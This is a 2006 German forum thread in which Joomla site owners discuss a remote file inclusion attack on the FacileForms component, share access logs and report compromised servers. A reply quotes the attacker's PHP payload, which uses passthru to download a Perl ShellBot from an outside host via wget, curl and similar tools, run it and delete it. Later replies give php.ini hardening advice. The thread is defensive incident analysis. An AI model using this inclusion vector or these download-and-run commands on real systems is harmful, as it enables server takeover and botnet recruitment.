Hackversuch FacileForms

**praetoria** · 11.09.2006 16:52

Hallo,

ich verwende die aktuelleste Joomla und FacileForms Version und konnte im Weblog seit zwei Tagen viele der nachfolgenden Eintragungen entdecken (es scheint nur die Perllib zu variieren). Vielleicht kann mir da jemand was genaueres zu sagen:

66.35.109.82 - - [11/Sep/2006:03:28:17 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.76"
66.45.254.74 - - [11/Sep/2006:03:28:22 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.805"
83.138.142.194 - - [11/Sep/2006:03:29:11 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.65"
85.13.194.180 - - [11/Sep/2006:03:30:06 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.805"
209.200.224.147 - - [11/Sep/2006:03:30:16 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.65"
205.234.215.43 - - [11/Sep/2006:03:30:58 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.805"
216.118.97.154 - - [11/Sep/2006:03:30:58 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.805"
209.139.225.212 - - [11/Sep/2006:03:30:59 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.63"
194.165.34.49 - - [11/Sep/2006:03:31:25 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.803"
216.176.190.44 - - [11/Sep/2006:03:31:25 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.805"
202.45.133.9 - - [11/Sep/2006:03:31:50 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.79"
207.158.22.127 - - [11/Sep/2006:03:32:17 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.79"
217.65.100.36 - - [11/Sep/2006:03:35:06 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://perqafohu.com/~armendibx/oki/lol.txt? HTTP/1.1" 200 5054 "-" "libwww-perl/5.803"

Viele Grüße
Holger

**ardcore** · 11.09.2006 17:14

Na schau doch an was er versucht aufzurufen:

http://xxxxxxxxx.com/~armendibx/oki/lol.txt

<?
passthru('cd /tmp;wget http://xxxxxxxxx.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
passthru('cd /tmp;curl -O http://xxxxxxxxx.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
passthru('cd /tmp;lwp-download http://xxxxxxxxx.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
passthru('cd /tmp;lynx -source http://xxxxxxxxx.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
passthru('cd /tmp;fetch http://xxxxxxxxx.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
passthru('cd /tmp;GET http://xxxxxxxxx.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
?>

Script kiddie kram...

Wollen per wget / lynx / GET etc. das hier ziehen und executen: http://xxxxxxxxx.com/~armendibx/oki/v6.txt

Da will wohl jemand aus deinem Server einen Bot machen

Schau mal ob unter /tmp die entsprechende Datei liegt. Läuft ein Prozess [v6] ?

**praetoria** · 11.09.2006 17:47

Hallo ardcore,

danke für die schnelle Antwort. Trotzdem kann ich momentan noch nicht ganz das Gefahrenpotenzial abschätzen, da mein Server managed ist und ich somit keinen Zugriff auf /tmp habe. Ich werde das mal mit dem Provider abklären.

Viele Grüße
Holger

**ardcore** · 11.09.2006 17:55

Hast du auf deinem Server den php safe_mode = on oder off?

Sollte er on sein brauchst du dir keine Sorgen machen da die
im Script aufgerufene Funktion passthru sich nicht auf das angegebene
/tmp Verzeichnis abbilden lässt.

Damit könntest du dir "den Weg" zum Provider sparen und die unangenehmen
Fragen gleich mit dazu

**flotte** · 11.09.2006 17:58

Ich kann massive Angriffe dieser Art bestätigen.
Es ist das übliche Muster. Bei halbwegs sinnvoll konfiguriertem Server erzeugt das nur Log-Einträge...
Wenn natürlch passthru nicht disabled ist und/oder exec() erlaubt und safemode=off und/oder exec_path nicht gesetzt ist und eines dieser Tools (meistens wget) installiert ist, dann geht das auch recht schnell "in die Hose", wie man so schön sagt.

**praetoria** · 11.09.2006 18:04

Hallo

also safe_mode ist zwar off, aber der ManagedServer steht bei Domainfactory, also gehe ich mal von einer sehr guten Konfiguration aus, da ich auch abgesehen von den weitergehenden Versuchen bis jetzt nichts schlimmeres bemerken konnte. DF ist aber kontaktiert.

Viele Grüße
Holger

**praetoria** · 12.09.2006 08:15

Hallo,
ich hätte das Problem natürlich gerne im FacileForms Forum gepostet, aber dort habe ich leider noch keine Schreibrechte.

Die Frage bleibt aber: ist es nun wirklich möglich, über facileforms.frame.php?ff_compath="XYZ" ausführbaren Code einzuschleusen? In diesem Falle müßte man doch dann momentan (bis zur Verfügbarkeit eines Patches) vom Einsatz von FacileForms abraten, da diese Angriffe doch recht massiv zu laufen scheinen.

Achja, bei mir läuft und lief übrigens kein Prozess v6 laut DF.

Viele Grüße
Holger

P.S.: Ich sehr jetzt gerade erst, dass eine Datei "facileforms.frame.php" im Verzeichnis "/components/com_facileforms/" überhaupt nicht existiert. Kann es sein, dass nur ältere Versionen vor der 1.4.6g betroffen sind und es dort eine solchermassen benannte Datei gibt?

P.S.2: Ich habe gerade die Datei "facileforms.frame.php" gefunden - uns zwar in der älteren 1.4.4 Version - es sieht also so aus, als wenn nur diese ältere Version von dem Problem betroffen wäre!

**bkant** · 12.09.2006 22:03

Zitat von praetoria

Hallo,
ich hätte das Problem natürlich gerne im FacileForms Forum gepostet, aber dort habe ich leider noch keine Schreibrechte.

Geht mir genau so, offenbar legt der Forenbetreiber Wert auf handverlesene Gesellschaft.

Zitat von praetoria

Die Frage bleibt aber: ist es nun wirklich möglich, über facileforms.frame.php?ff_compath="XYZ" ausführbaren Code einzuschleusen? In diesem Falle müßte man doch dann momentan (bis zur Verfügbarkeit eines Patches) vom Einsatz von FacileForms abraten, da diese Angriffe doch recht massiv zu laufen scheinen.

Ja, es ist möglich. Auf einem Root-Server lief seit Sonntag nachmittag so ein Perl-Skript, wahrscheinlich sogar in mehrfacher Ausführung. Der Server wurde heute neu aufgesetzt; binnen Minuten kamen die ersten Versuche, via Facile Forms wieder den "Stealth ShellBot" zu installieren. Siehe dazu:
http://www.pragmamx.org/forum-topic-15428.0.html

Facile Forms wurde bei der Neuinstallation des Servers restlos entfernt.

Zitat von praetoria

P.S.: Ich sehr jetzt gerade erst, dass eine Datei "facileforms.frame.php" im Verzeichnis "/components/com_facileforms/" überhaupt nicht existiert. Kann es sein, dass nur ältere Versionen vor der 1.4.6g betroffen sind und es dort eine solchermassen benannte Datei gibt?

P.S.2: Ich habe gerade die Datei "facileforms.frame.php" gefunden - uns zwar in der älteren 1.4.4 Version - es sieht also so aus, als wenn nur diese ältere Version von dem Problem betroffen wäre!

Leider kann ich das nicht bestätigen; hier lief bei Beginn der Angriffe eine Version 1.46d, die ebenfalls die genannte Datei nicht enthält. Im Augenblick ist Facile Forms nicht verwendbar.

Gruß
bk

**Onkel-Tobi** · 13.09.2006 07:47

Hallo, ich hatte dasselbe Problem, auch gehackt durch facile.forms
Ich habe im tmp Ordner folgende Dateien gehabt:
drwxr-xr-x 2 www-data www-data 4096 2006-09-06 16:06 ....
-rw-r--r-- 1 www-data www-data 1900257 2006-09-10 19:37 AoE2demo.exe
drwx------ 3 root root 4096 2006-09-11 13:40 clamav-6fc523beac4b6343
-rw-r--r-- 1 www-data www-data 15690 2006-09-06 12:42 httpd.sock
-rw-r--r-- 1 www-data www-data 15690 2006-09-06 12:42 httpd.sock.1
-rw-r--r-- 1 www-data www-data 15690 2006-09-06 12:42 httpd.sock.2
-rw-r--r-- 1 www-data www-data 15690 2006-09-06 12:42 httpd.sock.3
-rw-r--r-- 1 www-data www-data 15690 2006-09-06 12:42 httpd.sock.4
drwxrwxrwt 2 root root 4096 2006-08-25 16:05 .ICE-unix
drwx------ 2 root root 4096 2006-09-04 16:51 ssh-stQDu26553
drwxrwxrwt 2 root root 4096 2006-08-25 16:05 .X11-unix

Das sieht nicht gut aus, oder?
Das ganze System neu installieren is bei mir nicht...
Habe das root pw geändert und geschaut, was das für ne Gruppe war die die Seite gehackt hat.
War wohl SPYKIDS. Hoffe, dass nichts weiter passiert ist.
Wozu ist die facile.forms denn da und kann ich die so einfach löschen, ohne dass irgendwas nicht mehr tut?
Vielen Dank im Voraus,

Tobi

**flotte** · 13.09.2006 10:08

Zitat von Onkel-Tobi

Wozu ist die facile.forms denn da und kann ich die so einfach löschen, ohne dass irgendwas nicht mehr tut?

Kümmere Dich um die PHP-Konfiguration, dann passiert das nicht. Selbst wenn Du Facile-Forms jetzt löschst, wirst Du über andere Lücken genau dasselbe Problem bekommen.

In der php.ini mindestens setzen:
register_globals = Off
disable_functions = passthru, system, proc_open, shell_exec, escapeshellcmd, show_source, diskfreespace, disk_free_space

am besten dann noch:
safe_mode = on
safe_mode_exec_dir =/usr/local/php/bin/
allow_url_fopen = Off

wobei /usr/local/php/bin/ frei einstellbar ist. Leg ein solches Verzeichnis an und symlinke(!) dort alle Binaries, auf die php via exec() zugreifen soll. Das sind normalerweise nur Bildverarbeitungstools, wie convert, identify und composite (ImageMagick). Ggf. noch jhead und jpegtran.
Wenn Du den safemode unbedingt abschalten willst (off), dann nimm "exec" in die disable_functions mit auf.

Falls Du kein exec verbietest und safemode abschaltest, sei Dir aber bewusst, das in diesem Fall ein PHP-Scipt jedes verfügbare Binary auf den Server aufrufen kann. Diese Binaries kümmern sich einen Dreck um einen gesetzen Pfad mit open_basedir (das wird allzugerne vergessen) und haben Zufriff auf alles, was Dein PHP-Systemuser "sehen" kann. Falls Du einen allgemeinen Systemuser dafür verwendest (z.B. wwwrun, nobody etc), dann liegen alle anderen Webs (und einiges andere) für Schreibzugriff(!) offen. Die 777er-Verzeichnissse sowieso...

Thema: Hackversuch FacileForms

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Hackversuch FacileForms

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Ähnliche Themen

FacileForms funktioniert bei mir nicht mehr nach Upate

FacileForms 144: kein Menü 'neu, kopieren, veröff...'

Kann FacileForms "Sample Menü" nicht löschen !

FacileForms: Record als Mambo Content übernehmen

FacileForms - Ziel für Datensatz ändern

Lesezeichen

Lesezeichen

Berechtigungen